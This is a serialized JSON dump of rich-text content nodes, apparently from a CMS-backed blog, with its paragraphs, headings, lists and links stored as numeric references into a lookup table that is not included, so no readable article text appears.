{"type":194},{},{"nodeType":178,"data":16491,"content":16492},{},[16493],{"nodeType":173,"value":798,"marks":16494,"data":16495},[],{},{"nodeType":178,"data":16497,"content":16498},{},[16499],{"nodeType":173,"value":805,"marks":16500,"data":16503},[16501,16502],{"type":370},{"type":194},{},{"nodeType":178,"data":16505,"content":16506},{},[16507,16510,16517,16520,16527],{"nodeType":173,"value":814,"marks":16508,"data":16509},[],{},{"nodeType":186,"data":16511,"content":16512},{"uri":819},[16513],{"nodeType":173,"value":822,"marks":16514,"data":16516},[16515],{"type":194},{},{"nodeType":173,"value":827,"marks":16518,"data":16519},[],{},{"nodeType":186,"data":16521,"content":16522},{"uri":832},[16523],{"nodeType":173,"value":835,"marks":16524,"data":16526},[16525],{"type":194},{},{"nodeType":173,"value":840,"marks":16528,"data":16529},[],{},{"nodeType":178,"data":16531,"content":16532},{},[16533],{"nodeType":173,"value":847,"marks":16534,"data":16537},[16535,16536],{"type":370},{"type":194},{},{"nodeType":178,"data":16539,"content":16540},{},[16541],{"nodeType":173,"value":856,"marks":16542,"data":16543},[],{},{"nodeType":178,"data":16545,"content":16546},{},[16547],{"nodeType":173,"value":863,"marks":16548,"data":16551},[16549,16550],{"type":370},{"type":194},{},{"nodeType":178,"data":16553,"content":16554},{},[16555,16558,16565],{"nodeType":173,"value":872,"marks":16556,"data":16557},[],{},{"nodeType":186,"data":16559,"content":16560},{"uri":832},[16561],{"nodeType":173,"value":835,"marks":16562,"data":16564},[16563],{"type":194},{},{"nodeType":173,"value":883,"marks":16566,"data":16567},[],{},{"nodeType":312,"data":16569,"content":16572},{"target":16570},{"sys":16571},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":16574,"content":16575},{},[16576],{"nodeType":173,"value":896,"marks":16577,"data":16580},[16578,16579],{"type":370},{"type":194},{},{"nodeType":178,"data":16582,"content":16583},{},[16584],{"nodeType":173,"value":905,"marks":16585,"data":16586},[],{},{"nodeType":178,"data":16588,"content":16589},{},[16590],{"nodeType":173,"value":912,"marks":16591,"data":16594},[16592,16593],{"type":370},{"type":194},{},{"nodeType":178,"data":16596,"content":16597},{},[16598,16601,16607,16610,16616,16619,16625],{"nodeType":173,"value":921,"marks":16599,"data":16600},[],{},{"nodeType":186,"data":16602,"content":16603},{"uri":926},[16604],{"nodeType":173,"value":929,"marks":16605,"data":16606},[],{},{"nodeType":173,"value":933,"marks":16608,"data":16609},[],{},{"nodeType":186,"data":16611,"content":16612},{"uri":938},[16613],{"nodeType":173,"value":941,"marks":16614,"data":16615},[],{},{"nodeType":173,"value":945,"marks":16617,"data":16618},[],{},{"nodeType":186,"data":16620,"content":16621},{"uri":950},[16622],{"nodeType":173,"value":953,"marks":16623,"data":16624},[],{},{"nodeType":173,"value":957,"marks":16626,"data":16627},[],{},{"nodeType":231,"data":16629,"content":16630},{},[],{"nodeType":235,"data":16632,"content":16633},{},[16634],{"nodeType":173,"value":967,"marks":16635,"data":16637},[16636],{"type":370},{},{"nodeType":178,"data":16639,"content":16640},{},[16641],{"nodeType":173,"value":975,"marks":16642,"data":16645},[16643,16644],{"type":370},{"type":194},{},{"nodeType":178,"data":16647,"content":16648},{},[16649,16652,16659],{"nodeType":173,"value":984,"marks":16650,"data":16651},[],{},{"nodeType":186,"data":16653,"content":16654},{"uri":989},[16655],{"nodeType":173,"value":992,"marks":16656,"data":16658},[16657],{"type":194},{},{"nodeType":173,"value":997,"marks":16660,"data":16661},[],{},{"nodeType":178,"data":16663,"content":16664},{},[16665],{"nodeType":173,"value":1004,"marks":16666,"data":16669},[16667,16668],{"type":370},{"type":194},{},{"nodeType":178,"data":16671,"content":16672},{},[16673],{"nodeType":173,"value":1013,"marks":16674,"data":16675},[],{},{"nodeType":178,"data":16677,"content":16678},{},[16679],{"nodeType":173,"value":1020,"marks":16680,"data":16683},[16681,16682],{"type":370},{"type":194},{},{"nodeType":178,"data":16685,"content":16686},{},[16687,16690,16697,16700,16707],{"nodeType":173,"value":1029,"marks":16688,"data":16689},[],{},{"nodeType":186,"data":16691,"content":16692},{"uri":1034},[16693],{"nodeType":173,"value":1037,"marks":16694,"data":16696},[16695],{"type":194},{},{"nodeType":173,"value":1042,"marks":16698,"data":16699},[],{},{"nodeType":186,"data":16701,"content":16702},{"uri":1047},[16703],{"nodeType":173,"value":1050,"marks":16704,"data":16706},[16705],{"type":194},{},{"nodeType":173,"value":1055,"marks":16708,"data":16709},[],{},{"nodeType":312,"data":16711,"content":16714},{"target":16712},{"sys":16713},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":16716,"content":16717},{},[16718],{"nodeType":173,"value":1068,"marks":16719,"data":16722},[16720,16721],{"type":370},{"type":194},{},{"nodeType":178,"data":16724,"content":16725},{},[16726],{"nodeType":173,"value":1077,"marks":16727,"data":16728},[],{},{"nodeType":312,"data":16730,"content":16733},{"target":16731},{"sys":16732},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":16735,"content":16736},{},[],{"nodeType":235,"data":16738,"content":16739},{},[16740],{"nodeType":173,"value":1093,"marks":16741,"data":16743},[16742],{"type":370},{},{"nodeType":178,"data":16745,"content":16746},{},[16747],{"nodeType":173,"value":1101,"marks":16748,"data":16751},[16749,16750],{"type":370},{"type":194},{},{"nodeType":178,"data":16753,"content":16754},{},[16755],{"nodeType":173,"value":1110,"marks":16756,"data":16757},[],{},{"nodeType":250,"data":16759,"content":16760},{},[16761,16774,16787],{"nodeType":254,"data":16762,"content":16763},{},[16764],{"nodeType":178,"data":16765,"content":16766},{},[16767,16771],{"nodeType":173,"value":1123,"marks":16768,"data":16770},[16769],{"type":370},{},{"nodeType":173,"value":1128,"marks":16772,"data":16773},[],{},{"nodeType":254,"data":16775,"content":16776},{},[16777],{"nodeType":178,"data":16778,"content":16779},{},[16780,16784],{"nodeType":173,"value":1138,"marks":16781,"data":16783},[16782],{"type":370},{},{"nodeType":173,"value":1143,"marks":16785,"data":16786},[],{},{"nodeType":254,"data":16788,"content":16789},{},[16790],{"nodeType":178,"data":16791,"content":16792},{},[16793,16797,16800,16806],{"nodeType":173,"value":1153,"marks":16794,"data":16796},[16795],{"type":370},{},{"nodeType":173,"value":1158,"marks":16798,"data":16799},[],{},{"nodeType":186,"data":16801,"content":16802},{"uri":1163},[16803],{"nodeType":173,"value":1166,"marks":16804,"data":16805},[],{},{"nodeType":173,"value":1170,"marks":16807,"data":16808},[],{},{"nodeType":312,"data":16810,"content":16813},{"target":16811},{"sys":16812},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":16815,"content":16816},{},[],{"nodeType":235,"data":16818,"content":16819},{},[16820],{"nodeType":173,"value":1186,"marks":16821,"data":16823},[16822],{"type":370},{},{"nodeType":178,"data":16825,"content":16826},{},[16827],{"nodeType":173,"value":1194,"marks":16828,"data":16831},[16829,16830],{"type":370},{"type":194},{},{"nodeType":178,"data":16833,"content":16834},{},[16835],{"nodeType":173,"value":1203,"marks":16836,"data":16837},[],{},{"nodeType":312,"data":16839,"content":16842},{"target":16840},{"sys":16841},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":16844,"content":16845},{},[],{"nodeType":169,"data":16847,"content":16848},{},[16849],{"nodeType":173,"value":1219,"marks":16850,"data":16852},[16851],{"type":370},{},{"nodeType":178,"data":16854,"content":16855},{},[16856],{"nodeType":173,"value":1227,"marks":16857,"data":16858},[],{},{"nodeType":178,"data":16860,"content":16861},{},[16862],{"nodeType":173,"value":1234,"marks":16863,"data":16864},[],{},{"nodeType":250,"data":16866,"content":16867},{},[16868,16887,16906],{"nodeType":254,"data":16869,"content":16870},{},[16871],{"nodeType":178,"data":16872,"content":16873},{},[16874,16877,16884],{"nodeType":173,"value":1247,"marks":16875,"data":16876},[],{},{"nodeType":186,"data":16878,"content":16879},{"uri":1252},[16880],{"nodeType":173,"value":1255,"marks":16881,"data":16883},[16882],{"type":194},{},{"nodeType":173,"value":1260,"marks":16885,"data":16886},[],{},{"nodeType":254,"data":16888,"content":16889},{},[16890],{"nodeType":178,"data":16891,"content":16892},{},[16893,16896,16903],{"nodeType":173,"value":1270,"marks":16894,"data":16895},[],{},{"nodeType":186,"data":16897,"content":16898},{"uri":1275},[16899],{"nodeType":173,"value":1278,"marks":16900,"data":16902},[16901],{"type":194},{},{"nodeType":173,"value":1260,"marks":16904,"data":16905},[],{},{"nodeType":254,"data":16907,"content":16908},{},[16909],{"nodeType":178,"data":16910,"content":16911},{},[16912,16915,16922],{"nodeType":173,"value":1292,"marks":16913,"data":16914},[],{},{"nodeType":186,"data":16916,"content":16917},{"uri":1297},[16918],{"nodeType":173,"value":1300,"marks":16919,"data":16921},[16920],{"type":194},{},{"nodeType":173,"value":1260,"marks":16923,"data":16924},[],{},{"nodeType":178,"data":16926,"content":16927},{},[16928],{"nodeType":173,"value":1311,"marks":16929,"data":16930},[],{},{"nodeType":250,"data":16932,"content":16933},{},[16934,16947,16960,16973],{"nodeType":254,"data":16935,"content":16936},{},[16937],{"nodeType":178,"data":16938,"content":16939},{},[16940,16944],{"nodeType":173,"value":1324,"marks":16941,"data":16943},[16942],{"type":370},{},{"nodeType":173,"value":1329,"marks":16945,"data":16946},[],{},{"nodeType":254,"data":16948,"content":16949},{},[16950],{"nodeType":178,"data":16951,"content":16952},{},[16953,16957],{"nodeType":173,"value":1339,"marks":16954,"data":16956},[16955],{"type":370},{},{"nodeType":173,"value":1344,"marks":16958,"data":16959},[],{},{"nodeType":254,"data":16961,"content":16962},{},[16963],{"nodeType":178,"data":16964,"content":16965},{},[16966,16970],{"nodeType":173,"value":1354,"marks":16967,"data":16969},[16968],{"type":370},{},{"nodeType":173,"value":1359,"marks":16971,"data":16972},[],{},{"nodeType":254,"data":16974,"content":16975},{},[16976],{"nodeType":178,"data":16977,"content":16978},{},[16979,16983],{"nodeType":173,"value":1369,"marks":16980,"data":16982},[16981],{"type":370},{},{"nodeType":173,"value":1374,"marks":16984,"data":16985},[],{},{"nodeType":178,"data":16987,"content":16988},{},[16989],{"nodeType":173,"value":1381,"marks":16990,"data":16991},[],{},{"nodeType":231,"data":16993,"content":16994},{},[],{"nodeType":169,"data":16996,"content":16997},{},[16998],{"nodeType":173,"value":1391,"marks":16999,"data":17001},[17000],{"type":370},{},{"nodeType":178,"data":17003,"content":17004},{},[17005],{"nodeType":173,"value":1399,"marks":17006,"data":17007},[],{},{"nodeType":178,"data":17009,"content":17010},{},[17011],{"nodeType":173,"value":1406,"marks":17012,"data":17013},[],{},{"nodeType":312,"data":17015,"content":17018},{"target":17016},{"sys":17017},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":17020,"content":17021},{},[],{"nodeType":169,"data":17023,"content":17024},{},[17025],{"nodeType":173,"value":1422,"marks":17026,"data":17028},[17027],{"type":370},{},{"nodeType":178,"data":17030,"content":17031},{},[17032],{"nodeType":173,"value":1430,"marks":17033,"data":17034},[],{},{"nodeType":178,"data":17036,"content":17037},{},[17038],{"nodeType":173,"value":1437,"marks":17039,"data":17040},[],{},{"nodeType":178,"data":17042,"content":17043},{},[17044],{"nodeType":173,"value":1444,"marks":17045,"data":17046},[],{},{"nodeType":178,"data":17048,"content":17049},{},[17050,17053,17060,17063,17070],{"nodeType":173,"value":1451,"marks":17051,"data":17052},[],{},{"nodeType":186,"data":17054,"content":17055},{"uri":1456},[17056],{"nodeType":173,"value":1459,"marks":17057,"data":17059},[17058],{"type":194},{},{"nodeType":173,"value":1464,"marks":17061,"data":17062},[],{},{"nodeType":186,"data":17064,"content":17065},{"uri":1469},[17066],{"nodeType":173,"value":1472,"marks":17067,"data":17069},[17068],{"type":194},{},{"nodeType":173,"value":1477,"marks":17071,"data":17072},[],{},{"items":17074},[17075,17077],{"sys":17076,"name":505},{"id":504},{"sys":17078,"name":509},{"id":508},{"items":17080},[17081],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":17082},{"url":1496},{"__typename":1528,"sys":17084,"content":17085,"title":8598,"synopsis":8599,"hashTags":118,"publishedDate":8600,"slug":8601,"tagsCollection":17821,"authorsCollection":17827},{"id":7748},{"json":17086},{"nodeType":165,"data":17087,"content":17088},{},[17089,17096,17102,17108,17114,17124,17130,17135,17140,17143,17150,17156,17162,17167,17183,17189,17194,17200,17205,17211,17250,17255,17260,17266,17272,17275,17282,17298,17304,17309,17325,17330,17346,17352,17355,17362,17368,17404,17414,17417,17424,17439,17445,17458,17464,17470,17475,17481,17484,17491,17497,17545,17551,17554,17561,17566,17572,17578,17583,17589,17618,17624,17630,17635,17641,17646,17653,17669,17675,17705,17711,17741,17744,17751,17757,17762,17778,17784,17810,17815],{"nodeType":169,"data":17090,"content":17091},{},[17092],{"nodeType":173,"value":7757,"marks":17093,"data":17095},[17094],{"type":370},{},{"nodeType":178,"data":17097,"content":17098},{},[17099],{"nodeType":173,"value":7765,"marks":17100,"data":17101},[],{},{"nodeType":178,"data":17103,"content":17104},{},[17105],{"nodeType":173,"value":7772,"marks":17106,"data":17107},[],{},{"nodeType":178,"data":17109,"content":17110},{},[17111],{"nodeType":173,"value":7779,"marks":17112,"data":17113},[],{},{"nodeType":178,"data":17115,"content":17116},{},[17117,17121],{"nodeType":173,"value":7786,"marks":17118,"data":17120},[17119],{"type":370},{},{"nodeType":173,"value":7791,"marks":17122,"data":17123},[],{},{"nodeType":178,"data":17125,"content":17126},{},[17127],{"nodeType":173,"value":7798,"marks":17128,"data":17129},[],{},{"nodeType":312,"data":17131,"content":17134},{"target":17132},{"sys":17133},{"id":7805,"type":317,"linkType":318},[],{"nodeType":312,"data":17136,"content":17139},{"target":17137},{"sys":17138},{"id":7811,"type":317,"linkType":318},[],{"nodeType":231,"data":17141,"content":17142},{},[],{"nodeType":169,"data":17144,"content":17145},{},[17146],{"nodeType":173,"value":7820,"marks":17147,"data":17149},[17148],{"type":370},{},{"nodeType":178,"data":17151,"content":17152},{},[17153],{"nodeType":173,"value":7828,"marks":17154,"data":17155},[],{},{"nodeType":178,"data":17157,"content":17158},{},[17159],{"nodeType":173,"value":7835,"marks":17160,"data":17161},[],{},{"nodeType":312,"data":17163,"content":17166},{"target":17164},{"sys":17165},{"id":7842,"type":317,"linkType":318},[],{"nodeType":178,"data":17168,"content":17169},{},[17170,17173,17180],{"nodeType":173,"value":7848,"marks":17171,"data":17172},[],{},{"nodeType":186,"data":17174,"content":17175},{"uri":7853},[17176],{"nodeType":173,"value":7856,"marks":17177,"data":17179},[17178],{"type":194},{},{"nodeType":173,"value":7861,"marks":17181,"data":17182},[],{},{"nodeType":178,"data":17184,"content":17185},{},[17186],{"nodeType":173,"value":7868,"marks":17187,"data":17188},[],{},{"nodeType":312,"data":17190,"content":17193},{"target":17191},{"sys":17192},{"id":7875,"type":317,"linkType":318},[],{"nodeType":178,"data":17195,"content":17196},{},[17197],{"nodeType":173,"value":7881,"marks":17198,"data":17199},[],{},{"nodeType":312,"data":17201,"content":17204},{"target":17202},{"sys":17203},{"id":7888,"type":317,"linkType":318},[],{"nodeType":178,"data":17206,"content":17207},{},[17208],{"nodeType":173,"value":7894,"marks":17209,"data":17210},[],{},{"nodeType":250,"data":17212,"content":17213},{},[17214,17223,17232,17241],{"nodeType":254,"data":17215,"content":17216},{},[17217],{"nodeType":178,"data":17218,"content":17219},{},[17220],{"nodeType":173,"value":7907,"marks":17221,"data":17222},[],{},{"nodeType":254,"data":17224,"content":17225},{},[17226],{"nodeType":178,"data":17227,"content":17228},{},[17229],{"nodeType":173,"value":7917,"marks":17230,"data":17231},[],{},{"nodeType":254,"data":17233,"content":17234},{},[17235],{"nodeType":178,"data":17236,"content":17237},{},[17238],{"nodeType":173,"value":7927,"marks":17239,"data":17240},[],{},{"nodeType":254,"data":17242,"content":17243},{},[17244],{"nodeType":178,"data":17245,"content":17246},{},[17247],{"nodeType":173,"value":7937,"marks":17248,"data":17249},[],{},{"nodeType":312,"data":17251,"content":17254},{"target":17252},{"sys":17253},{"id":7944,"type":317,"linkType":318},[],{"nodeType":312,"data":17256,"content":17259},{"target":17257},{"sys":17258},{"id":7950,"type":317,"linkType":318},[],{"nodeType":178,"data":17261,"content":17262},{},[17263],{"nodeType":173,"value":7956,"marks":17264,"data":17265},[],{},{"nodeType":178,"data":17267,"content":17268},{},[17269],{"nodeType":173,"value":7963,"marks":17270,"data":17271},[],{},{"nodeType":231,"data":17273,"content":17274},{},[],{"nodeType":169,"data":17276,"content":17277},{},[17278],{"nodeType":173,"value":7973,"marks":17279,"data":17281},[17280],{"type":370},{},{"nodeType":178,"data":17283,"content":17284},{},[17285,17288,17295],{"nodeType":173,"value":7981,"marks":17286,"data":17287},[],{},{"nodeType":186,"data":17289,"content":17290},{"uri":7986},[17291],{"nodeType":173,"value":7989,"marks":17292,"data":17294},[17293],{"type":194},{},{"nodeType":173,"value":7994,"marks":17296,"data":17297},[],{},{"nodeType":178,"data":17299,"content":17300},{},[17301],{"nodeType":173,"value":8001,"marks":17302,"data":17303},[],{},{"nodeType":312,"data":17305,"content":17308},{"target":17306},{"sys":17307},{"id":8008,"type":317,"linkType":318},[],{"nodeType":178,"data":17310,"content":17311},{},[17312,17315,17322],{"nodeType":173,"value":8014,"marks":17313,"data":17314},[],{},{"nodeType":186,"data":17316,"content":17317},{"uri":1842},[17318],{"nodeType":173,"value":8021,"marks":17319,"data":17321},[17320],{"type":194},{},{"nodeType":173,"value":1477,"marks":17323,"data":17324},[],{},{"nodeType":312,"data":17326,"content":17329},{"target":17327},{"sys":17328},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":17331,"content":17332},{},[17333,17336,17343],{"nodeType":173,"value":8038,"marks":17334,"data":17335},[],{},{"nodeType":186,"data":17337,"content":17338},{"uri":8043},[17339],{"nodeType":173,"value":8046,"marks":17340,"data":17342},[17341],{"type":194},{},{"nodeType":173,"value":8051,"marks":17344,"data":17345},[],{},{"nodeType":178,"data":17347,"content":17348},{},[17349],{"nodeType":173,"value":8058,"marks":17350,"data":17351},[],{},{"nodeType":231,"data":17353,"content":17354},{},[],{"nodeType":169,"data":17356,"content":17357},{},[17358],{"nodeType":173,"value":8068,"marks":17359,"data":17361},[17360],{"type":370},{},{"nodeType":178,"data":17363,"content":17364},{},[17365],{"nodeType":173,"value":8076,"marks":17366,"data":17367},[],{},{"nodeType":178,"data":17369,"content":17370},{},[17371,17374,17381,17384,17391,17394,17401],{"nodeType":173,"value":8083,"marks":17372,"data":17373},[],{},{"nodeType":186,"data":17375,"content":17376},{"uri":8088},[17377],{"nodeType":173,"value":8091,"marks":17378,"data":17380},[17379],{"type":194},{},{"nodeType":173,"value":933,"marks":17382,"data":17383},[],{},{"nodeType":186,"data":17385,"content":17386},{"uri":8100},[17387],{"nodeType":173,"value":1812,"marks":17388,"data":17390},[17389],{"type":194},{},{"nodeType":173,"value":8107,"marks":17392,"data":17393},[],{},{"nodeType":186,"data":17395,"content":17396},{"uri":8112},[17397],{"nodeType":173,"value":8115,"marks":17398,"data":17400},[17399],{"type":194},{},{"nodeType":173,"value":8120,"marks":17402,"data":17403},[],{},{"nodeType":178,"data":17405,"content":17406},{},[17407,17410],{"nodeType":173,"value":8127,"marks":17408,"data":17409},[],{},{"nodeType":173,"value":8131,"marks":17411,"data":17413},[17412],{"type":370},{},{"nodeType":231,"data":17415,"content":17416},{},[],{"nodeType":169,"data":17418,"content":17419},{},[17420],{"nodeType":173,"value":8142,"marks":17421,"data":17423},[17422],{"type":370},{},{"nodeType":178,"data":17425,"content":17426},{},[17427,17430,17436],{"nodeType":173,"value":8150,"marks":17428,"data":17429},[],{},{"nodeType":186,"data":17431,"content":17432},{"uri":6820},[17433],{"nodeType":173,"value":8157,"marks":17434,"data":17435},[],{},{"nodeType":173,"value":8161,"marks":17437,"data":17438},[],{},{"nodeType":178,"data":17440,"content":17441},{},[17442],{"nodeType":173,"value":8168,"marks":17443,"data":17444},[],{},{"nodeType":178,"data":17446,"content":17447},{},[17448,17451,17455],{"nodeType":173,"value":8175,"marks":17449,"data":17450},[],{},{"nodeType":173,"value":8179,"marks":17452,"data":17454},[17453],{"type":370},{},{"nodeType":173,"value":8184,"marks":17456,"data":17457},[],{},{"nodeType":178,"data":17459,"content":17460},{},[17461],{"nodeType":173,"value":8191,"marks":17462,"data":17463},[],{},{"nodeType":178,"data":17465,"content":17466},{},[17467],{"nodeType":173,"value":8198,"marks":17468,"data":17469},[],{},{"nodeType":312,"data":17471,"content":17474},{"target":17472},{"sys":17473},{"id":8205,"type":317,"linkType":318},[],{"nodeType":178,"data":17476,"content":17477},{},[17478],{"nodeType":173,"value":8211,"marks":17479,"data":17480},[],{},{"nodeType":231,"data":17482,"content":17483},{},[],{"nodeType":169,"data":17485,"content":17486},{},[17487],{"nodeType":173,"value":8221,"marks":17488,"data":17490},[17489],{"type":370},{},{"nodeType":178,"data":17492,"content":17493},{},[17494],{"nodeType":173,"value":8229,"marks":17495,"data":17496},[],{},{"nodeType":250,"data":17498,"content":17499},{},[17500,17509,17518,17527,17536],{"nodeType":254,"data":17501,"content":17502},{},[17503],{"nodeType":178,"data":17504,"content":17505},{},[17506],{"nodeType":173,"value":8242,"marks":17507,"data":17508},[],{},{"nodeType":254,"data":17510,"content":17511},{},[17512],{"nodeType":178,"data":17513,"content":17514},{},[17515],{"nodeType":173,"value":8252,"marks":17516,"data":17517},[],{},{"nodeType":254,"data":17519,"content":17520},{},[17521],{"nodeType":178,"data":17522,"content":17523},{},[17524],{"nodeType":173,"value":8262,"marks":17525,"data":17526},[],{},{"nodeType":254,"data":17528,"content":17529},{},[17530],{"nodeType":178,"data":17531,"content":17532},{},[17533],{"nodeType":173,"value":8272,"marks":17534,"data":17535},[],{},{"nodeType":254,"data":17537,"content":17538},{},[17539],{"nodeType":178,"data":17540,"content":17541},{},[17542],{"nodeType":173,"value":8282,"marks":17543,"data":17544},[],{},{"nodeType":178,"data":17546,"content":17547},{},[17548],{"nodeType":173,"value":8289,"marks":17549,"data":17550},[],{},{"nodeType":231,"data":17552,"content":17553},{},[],{"nodeType":169,"data":17555,"content":17556},{},[17557],{"nodeType":173,"value":8299,"marks":17558,"data":17560},[17559],{"type":370},{},{"nodeType":312,"data":17562,"content":17565},{"target":17563},{"sys":17564},{"id":8307,"type":317,"linkType":318},[],{"nodeType":178,"data":17567,"content":17568},{},[17569],{"nodeType":173,"value":8313,"marks":17570,"data":17571},[],{},{"nodeType":178,"data":17573,"content":17574},{},[17575],{"nodeType":173,"value":8320,"marks":17576,"data":17577},[],{},{"nodeType":312,"data":17579,"content":17582},{"target":17580},{"sys":17581},{"id":8327,"type":317,"linkType":318},[],{"nodeType":178,"data":17584,"content":17585},{},[17586],{"nodeType":173,"value":8333,"marks":17587,"data":17588},[],{},{"nodeType":250,"data":17590,"content":17591},{},[17592,17605],{"nodeType":254,"data":17593,"content":17594},{},[17595],{"nodeType":178,"data":17596,"content":17597},{},[17598,17602],{"nodeType":173,"value":8346,"marks":17599,"data":17601},[17600],{"type":370},{},{"nodeType":173,"value":8351,"marks":17603,"data":17604},[],{},{"nodeType":254,"data":17606,"content":17607},{},[17608],{"nodeType":178,"data":17609,"content":17610},{},[17611,17615],{"nodeType":173,"value":8361,"marks":17612,"data":17614},[17613],{"type":370},{},{"nodeType":173,"value":8366,"marks":17616,"data":17617},[],{},{"nodeType":178,"data":17619,"content":17620},{},[17621],{"nodeType":173,"value":8373,"marks":17622,"data":17623},[],{},{"nodeType":178,"data":17625,"content":17626},{},[17627],{"nodeType":173,"value":8380,"marks":17628,"data":17629},[],{},{"nodeType":312,"data":17631,"content":17634},{"target":17632},{"sys":17633},{"id":8387,"type":317,"linkType":318},[],{"nodeType":178,"data":17636,"content":17637},{},[17638],{"nodeType":173,"value":8393,"marks":17639,"data":17640},[],{},{"nodeType":312,"data":17642,"content":17645},{"target":17643},{"sys":17644},{"id":8400,"type":317,"linkType":318},[],{"nodeType":235,"data":17647,"content":17648},{},[17649],{"nodeType":173,"value":8406,"marks":17650,"data":17652},[17651],{"type":370},{},{"nodeType":178,"data":17654,"content":17655},{},[17656,17659,17666],{"nodeType":173,"value":8414,"marks":17657,"data":17658},[],{},{"nodeType":186,"data":17660,"content":17661},{"uri":8419},[17662],{"nodeType":173,"value":8422,"marks":17663,"data":17665},[17664],{"type":194},{},{"nodeType":173,"value":8427,"marks":17667,"data":17668},[],{},{"nodeType":178,"data":17670,"content":17671},{},[17672],{"nodeType":173,"value":8434,"marks":17673,"data":17674},[],{},{"nodeType":250,"data":17676,"content":17677},{},[17678,17687,17696],{"nodeType":254,"data":17679,"content":17680},{},[17681],{"nodeType":178,"data":17682,"content":17683},{},[17684],{"nodeType":173,"value":8447,"marks":17685,"data":17686},[],{},{"nodeType":254,"data":17688,"content":17689},{},[17690],{"nodeType":178,"data":17691,"content":17692},{},[17693],{"nodeType":173,"value":8457,"marks":17694,"data":17695},[],{},{"nodeType":254,"data":17697,"content":17698},{},[17699],{"nodeType":178,"data":17700,"content":17701},{},[17702],{"nodeType":173,"value":8467,"marks":17703,"data":17704},[],{},{"nodeType":178,"data":17706,"content":17707},{},[17708],{"nodeType":173,"value":8474,"marks":17709,"data":17710},[],{},{"nodeType":250,"data":17712,"content":17713},{},[17714,17723,17732],{"nodeType":254,"data":17715,"content":17716},{},[17717],{"nodeType":178,"data":17718,"content":17719},{},[17720],{"nodeType":173,"value":8487,"marks":17721,"data":17722},[],{},{"nodeType":254,"data":17724,"content":17725},{},[17726],{"nodeType":178,"data":17727,"content":17728},{},[17729],{"nodeType":173,"value":8497,"marks":17730,"data":17731},[],{},{"nodeType":254,"data":17733,"content":17734},{},[17735],{"nodeType":178,"data":17736,"content":17737},{},[17738],{"nodeType":173,"value":8507,"marks":17739,"data":17740},[],{},{"nodeType":231,"data":17742,"content":17743},{},[],{"nodeType":169,"data":17745,"content":17746},{},[17747],{"nodeType":173,"value":8517,"marks":17748,"data":17750},[17749],{"type":370},{},{"nodeType":178,"data":17752,"content":17753},{},[17754],{"nodeType":173,"value":8525,"marks":17755,"data":17756},[],{},{"nodeType":312,"data":17758,"content":17761},{"target":17759},{"sys":17760},{"id":8532,"type":317,"linkType":318},[],{"nodeType":178,"data":17763,"content":17764},{},[17765,17768,17775],{"nodeType":173,"value":8538,"marks":17766,"data":17767},[],{},{"nodeType":186,"data":17769,"content":17770},{"uri":6820},[17771],{"nodeType":173,"value":8545,"marks":17772,"data":17774},[17773],{"type":194},{},{"nodeType":173,"value":8550,"marks":17776,"data":17777},[],{},{"nodeType":178,"data":17779,"content":17780},{},[17781],{"nodeType":173,"value":8557,"marks":17782,"data":17783},[],{},{"nodeType":178,"data":17785,"content":17786},{},[17787,17790,17797,17800,17807],{"nodeType":173,"value":1451,"marks":17788,"data":17789},[],{},{"nodeType":186,"data":17791,"content":17792},{"uri":1456},[17793],{"nodeType":173,"value":1459,"marks":17794,"data":17796},[17795],{"type":194},{},{"nodeType":173,"value":1464,"marks":17798,"data":17799},[],{},{"nodeType":186,"data":17801,"content":17802},{"uri":1469},[17803],{"nodeType":173,"value":1472,"marks":17804,"data":17806},[17805],{"type":194},{},{"nodeType":173,"value":1477,"marks":17808,"data":17809},[],{},{"nodeType":312,"data":17811,"content":17814},{"target":17812},{"sys":17813},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":17816,"content":17817},{},[17818],{"nodeType":173,"value":37,"marks":17819,"data":17820},[],{},{"items":17822},[17823,17825],{"sys":17824,"name":505},{"id":504},{"sys":17826,"name":509},{"id":508},{"items":17828},[17829],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":17830},{"url":8615},{"__typename":1528,"sys":17832,"content":17833,"title":9225,"synopsis":9226,"hashTags":118,"publishedDate":9227,"slug":9228,"tagsCollection":18356,"authorsCollection":18362},{"id":8618},{"json":17834},{"nodeType":165,"data":17835,"content":17836},{},[17837,17853,17859,17865,17868,17875,17891,17907,17934,17939,17942,17949,17956,17962,17978,17984,17989,17994,18000,18006,18013,18019,18025,18030,18036,18052,18059,18065,18071,18087,18092,18108,18113,18119,18124,18127,18134,18140,18156,18162,18185,18191,18198,18201,18208,18214,18220,18225,18231,18270,18275,18281,18307,18312,18350],{"nodeType":178,"data":17838,"content":17839},{},[17840,17843,17850],{"nodeType":173,"value":37,"marks":17841,"data":17842},[],{},{"nodeType":186,"data":17844,"content":17845},{"uri":5002},[17846],{"nodeType":173,"value":6811,"marks":17847,"data":17849},[17848],{"type":194},{},{"nodeType":173,"value":8637,"marks":17851,"data":17852},[],{},{"nodeType":178,"data":17854,"content":17855},{},[17856],{"nodeType":173,"value":8644,"marks":17857,"data":17858},[],{},{"nodeType":178,"data":17860,"content":17861},{},[17862],{"nodeType":173,"value":8651,"marks":17863,"data":17864},[],{},{"nodeType":231,"data":17866,"content":17867},{},[],{"nodeType":169,"data":17869,"content":17870},{},[17871],{"nodeType":173,"value":8661,"marks":17872,"data":17874},[17873],{"type":370},{},{"nodeType":178,"data":17876,"content":17877},{},[17878,17881,17888],{"nodeType":173,"value":8669,"marks":17879,"data":17880},[],{},{"nodeType":186,"data":17882,"content":17883},{"uri":8674},[17884],{"nodeType":173,"value":8677,"marks":17885,"data":17887},[17886],{"type":194},{},{"nodeType":173,"value":8682,"marks":17889,"data":17890},[],{},{"nodeType":178,"data":17892,"content":17893},{},[17894,17897,17904],{"nodeType":173,"value":8689,"marks":17895,"data":17896},[],{},{"nodeType":186,"data":17898,"content":17899},{"uri":926},[17900],{"nodeType":173,"value":8696,"marks":17901,"data":17903},[17902],{"type":194},{},{"nodeType":173,"value":8701,"marks":17905,"data":17906},[],{},{"nodeType":178,"data":17908,"content":17909},{},[17910,17913,17917,17920,17924,17927,17931],{"nodeType":173,"value":8708,"marks":17911,"data":17912},[],{},{"nodeType":173,"value":8712